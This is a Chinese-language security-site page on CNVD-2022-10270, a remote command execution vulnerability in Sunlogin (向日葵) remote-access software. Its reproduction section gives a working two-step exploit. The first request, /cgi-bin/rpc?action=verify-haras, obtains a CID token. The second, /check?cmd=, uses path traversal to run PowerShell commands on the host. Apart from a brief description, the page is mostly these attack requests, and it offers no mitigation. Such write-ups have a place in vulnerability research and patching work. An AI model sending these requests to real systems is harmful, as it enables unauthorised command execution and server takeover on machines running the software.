黑客街 黑客街

向日葵 check 远程命令执行漏洞 CNVD-2022-10270

目录

漏洞描述 #

向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取

漏洞影响 #

网络测绘 #

漏洞复现 #

向日葵在开启后会默认在 40000-65535 之间开启某端口

向日葵 check 远程命令执行漏洞 CNVD-2022-10270

发送请求获取CID

/cgi-bin/rpc?action=verify-haras
向日葵 check 远程命令执行漏洞 CNVD-2022-10270

使用获取到的 verify_string 作为 cookie的 CID字段,进行命令执行

/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
向日葵 check 远程命令执行漏洞 CNVD-2022-10270

 

What are your Feelings
黑客街导航站是一款努力把互联网安全站点集接到一起,希望为每个小伙伴提供良好的"安全"体验。

街头小贩 匿名追踪 杀软对比

黑客街公众号黑客街

黑客街公众号

我要合作黑客街

我要合作

关于我们 免责说明 商务合作

Copyright © 2022 黑客街   豫ICP备19005024号    站点地图